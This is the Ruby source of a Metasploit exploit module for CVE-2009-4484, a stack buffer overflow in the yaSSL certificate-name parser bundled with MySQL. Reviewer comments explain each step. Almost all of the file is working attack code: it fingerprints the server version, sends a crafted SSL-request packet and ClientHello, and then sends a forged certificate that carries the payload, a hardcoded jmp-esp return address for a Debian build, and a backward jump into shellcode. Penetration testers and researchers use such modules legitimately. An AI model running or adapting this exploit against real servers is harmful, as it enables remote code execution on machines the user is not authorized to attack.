Path: blob/master/modules/exploits/linux/mysql/mysql_yassl_getname.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Exploit module for CVE-2009-4484, a stack buffer overflow in the yaSSL
# CertDecoder::GetName routine bundled with MySQL, reached through the client
# Certificate message of a TLS handshake.
#
# Flow of #exploit: read the MySQL greeting to learn the server version and
# pick a target, send a MySQL SSL-request packet followed by a fixed TLS
# ClientHello, then send a Certificate handshake message whose name field
# carries the payload and the overwritten return address.
#
# The Description below records the preconditions (host-based auth must
# already pass, the server must listen on a reachable interface and have SSL
# enabled) and the builds where compiler hardening (/GS, /SafeSEH, FORTIFY)
# prevented exploitation during testing.
class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::Tcp
  # NOTE(review): the Seh mixin is included but nothing in this file calls
  # into it; the single Linux target uses a plain JmpEsp return address.
  include Msf::Exploit::Remote::Seh

  # Module metadata and options.
  #
  # Notes on values that #exploit depends on:
  # - 'Space' (1046) together with the 1074 constant in #exploit keeps the
  #   overwritten return address at a fixed offset (1082) inside the name
  #   field regardless of the encoded payload length.
  # - 'DisableNops' is true because the filler in front of the payload is
  #   generated with rand_text in #exploit rather than a nop sled.
  # - The 'Automatic' target is resolved in #exploit by matching
  #   "(<reported version>)" as a substring of the other target names.
  # - 'JmpEsp' is the 32-bit address written over the saved return pointer
  #   (the key name indicates a jmp-esp gadget in that distro's binary).
  # - RPORT defaults to 3306 (MySQL).
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'MySQL yaSSL CertDecoder::GetName Buffer Overflow',
      'Description'    => %q{
        This module exploits a stack buffer overflow in the yaSSL (1.9.8 and earlier)
        implementation bundled with MySQL. By sending a specially crafted
        client certificate, an attacker can execute arbitrary code.

        This vulnerability is present within the CertDecoder::GetName function inside
        "taocrypt/src/asn.cpp". However, the stack buffer that is written to exists
        within a parent function's stack frame.

        NOTE: This vulnerability requires a non-default configuration. First, the attacker
        must be able to pass the host-based authentication. Next, the server must be
        configured to listen on an accessible network interface. Lastly, the server
        must have been manually configured to use SSL.

        The binary from version 5.5.0-m2 was built with /GS and /SafeSEH. During testing
        on Windows XP SP3, these protections successfully prevented exploitation.

        Testing was also done with mysql on Ubuntu 9.04. Although the vulnerable code is
        present, both version 5.5.0-m2 built from source and version 5.0.75 from a binary
        package were not exploitable due to the use of the compiler's FORTIFY feature.

        Although suse11 was mentioned in the original blog post, the binary package they
        provide does not contain yaSSL or support SSL.
      },
      'Author'         => [ 'jduck' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2009-4484' ],
          [ 'BID', '37640' ],
          [ 'BID', '37943' ],
          [ 'BID', '37974' ],
          [ 'OSVDB', '61956' ],
          [ 'URL', 'http://web.archive.org/web/20100129041727/http://secunia.com:80/advisories/38344/' ]
        ],
      'Privileged'     => true,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload'        =>
        {
          'Space'    => 1046,
          'BadChars' => "",
          'StackAdjustment' => -3500,
          'DisableNops' => true
        },
      'Platform'       => 'linux',
      'Targets'        =>
        [
          [ 'Automatic', { } ],
          [ 'Debian 5.0 - MySQL (5.0.51a-24+lenny2)', { 'JmpEsp' => 0x0807dc34 } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => '2010-01-25'))

    register_options([ Opt::RPORT(3306) ], self)
  end

  # Runs the exploit against RHOST/RPORT.
  #
  # 1. Connect and read the MySQL greeting to extract the server version.
  # 2. Resolve the target (automatic mode matches the version string against
  #    the target names).
  # 3. Send a 32-byte MySQL SSL-request packet followed by a fixed TLS 1.0
  #    ClientHello record.
  # 4. Send a TLS Certificate handshake message containing a hand-built
  #    X.509-shaped blob whose name field holds the payload and the return
  #    address, then hand off to the payload handler and disconnect.
  #
  # Aborts via fail_with when the server refuses the connection
  # (Failure::Unreachable) or no target matches the reported version
  # (Failure::NoTarget).
  def exploit

    connect

    # read the mysql server hello :)
    # get_once(-1, 5) waits up to 5 seconds; the `|| ''` makes buf always a
    # String, so this `if` is always entered (an empty greeting included).
    version = nil
    if (buf = sock.get_once(-1, 5) || '')
      #print_status("\n" + Rex::Text.to_hex_dump(buf))
      # A host-based denial arrives as a text error instead of a greeting.
      if (buf =~ /is not allowed to connect/)
        fail_with(Failure::Unreachable, 'The server refused our connection!')
      end

      # First four bytes as a little-endian word (3-byte packet length plus
      # the sequence byte), fifth byte as the protocol version; cmd is unused.
      # NOTE(review): a greeting shorter than 5 bytes leaves len1 nil (or rest
      # nil), so the next two lines raise instead of reaching a fail_with.
      len1,cmd = buf[0,5].unpack('VC')
      rest = buf[5,len1]
      # The server version string is NUL-terminated right after the protocol byte.
      idx = rest.index("\x00")
      if (idx)
        version = rest[0,idx]
        print_status("Server reports version: #{version}")
      end
    end

    # handle automatic target selection
    # Automatic mode looks for "(<version>)" as a substring of a target name,
    # e.g. "(5.0.51a-24+lenny2)"; when several match, the last one wins.
    mytarget = nil
    if (target.name =~ /Automatic/)
      print_status("Attempting to locate a corresponding target")
      # NOTE(review): if no version string was parsed above, version is still
      # nil here and this concatenation raises TypeError instead of reaching
      # the NoTarget failure below.
      version = "(" + version + ")"
      targets.each { |tgt|
        if (tgt.name.include?(version))
          mytarget = tgt
        end
      }

      if (not mytarget)
        fail_with(Failure::NoTarget, 'Unable to detect target automatically')
      else
        print_status("Using automatically detected target: #{mytarget.name}")
      end
    else
      mytarget = target
      print_status("Trying target #{mytarget.name}...")
    end

    # create/send the hello packet
    # MySQL packet header: 3-byte length 0x20 (32) plus sequence number 1,
    # packed as one little-endian word.
    hello = [0x01000020].pack('V')
    # 32-byte SSL-request body: capability flags (0x0003ae85, which includes
    # the 0x800 CLIENT_SSL bit), max packet size, charset, and reserved zeros.
    hello << "\x85\xae\x03\x00"+"\x00\x00\x00\x01"+"\x08\x00\x00\x00"
    hello << "\x00" * 20
    # Followed by a TLS 1.0 record (type 0x16 handshake, version 3.1) holding
    # a ClientHello with a fixed 32-byte random and a static cipher-suite list.
    hello << "\x16\x03\x01\x00\x60\x01\x00\x00\x5c\x03\x01\x4a\x92\xce\xd1\xe1"
    hello << "\xab\x48\x51\xc8\x49\xa3\x5e\x97\x1a\xea\xc2\x99\x82\x33\x42\xd5"
    hello << "\x14\xbc\x05\x64\xdc\xb5\x48\xbd\x4c\x11\x55\x00\x00\x34\x00\x39"
    hello << "\x00\x38\x00\x35\x00\x16\x00\x13\x00\x0a\x00\x33\x00\x32\x00\x2f"
    hello << "\x00\x66\x00\x05\x00\x04\x00\x63\x00\x62\x00\x61\x00\x15\x00\x12"
    hello << "\x00\x09\x00\x65\x00\x64\x00\x60\x00\x14\x00\x11\x00\x08\x00\x06"
    hello << "\x00\x03\x02\x01\x00"
    sock.put(hello)
    # NOTE(review): the server's reply to the ClientHello is never read; the
    # Certificate message below is written straight after.


    # build a cn that will trigger the vulnerability
    # Layout of cn:
    #   [rand filler][encoded payload]  -> exactly payload_space bytes
    #   [8 zero bytes]                  -> the memset(x, 0, 0) arguments noted below
    #   [rand pad]                      -> brings the total to 1082 bytes for any Space
    #   [JmpEsp]                        -> overwritten return address
    #   [jmp $-distance]                -> backward jump back to the payload
    cn = rand_text(payload_space - payload.encoded.length)
    cn << payload.encoded
    cn << [0,0].pack('VV') # memset(x,0,0); (this is x and the length)
    # NOTE: x in above (also gets passed to free())
    pad = 1074 - payload_space
    cn << rand_text(pad)
    cn << [mytarget['JmpEsp']].pack('V')
    # distance spans the 4-byte return address, pad, the 8 zero bytes and the
    # payload, so `jmp $-distance` resolves to the payload's first byte.
    distance = 4 + pad + 8 + payload.encoded.length
    cn << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string

    # Name element: 4-byte prefix, 4-byte big-endian length of cn, then cn.
    cert = "\x2a\x86\x00\x84"
    cert << [cn.length].pack('N')
    cert << cn
    # Hand-written ASN.1 wrappers (SEQUENCE 0x30 / SET 0x31 / OID 0x06) whose
    # long-form lengths (0x82 0x01 0x01 = 257, 0x82 0x00 0x02 = 2) do not match
    # the data that follows -- presumably the shape the decoder accepts on its
    # way into GetName; left exactly as written.
    cert = "\x30"+
      "\x82\x01\x01"+
      "\x31"+
      "\x82\x01\x01"+
      "\x30"+
      "\x82\x01\x01"+
      "\x06"+
      "\x82\x00\x02" +
      cert

    # TBSCertificate prefix: [0] EXPLICIT version (INTEGER 2, i.e. v3), serial
    # number 0, and a signature AlgorithmIdentifier (OID 1.2.840.113549.1.1.4
    # with NULL parameters), then the name structure built above.
    cert = "\xa0\x03" +
      "\x02\x01\x02" +
      "\x02\x01\x00" +
      "\x30" + "\x0d" + "\x06\x09\x2a\x86\x48\x86\xf7\x0d\x01\x01\x04\x05\x00" +
      cert

    # wrap in 2 sequences
    # Inner SEQUENCE plays the TBSCertificate, outer SEQUENCE the Certificate;
    # no signatureAlgorithm/signatureValue follow.
    cert = SNMP::BER.encode_tlv(0x30, cert)
    cert = SNMP::BER.encode_tlv(0x30, cert)

    # TLS Certificate message: the certificate and the certificate list each
    # get a 24-bit big-endian length prefix, then handshake type 0x0b with its
    # own 24-bit length, all inside a TLS 1.0 record with a 16-bit length.
    cert1 = big_endian_24bit(cert.length) + cert
    certs = big_endian_24bit(cert1.length) + cert1

    handshake = "\x0b" + big_endian_24bit(certs.length) + certs
    msg = "\x16\x03\x01"
    msg << [handshake.length].pack('n')
    msg << handshake

    sock.put(msg)

    handler
    disconnect
  end


  # Encodes len as a 3-byte big-endian integer (the TLS uint24 length form).
  # Only the low 24 bits are kept; larger values are silently truncated.
  #
  # @param len [Integer] non-negative length to encode
  # @return [String] three bytes, most significant first
  def big_endian_24bit(len)
    uno = (len >> 16) & 0xff
    dos = (len >> 8) & 0xff
    tre = len & 0xff
    [uno,dos,tre].pack('C*')
  end
end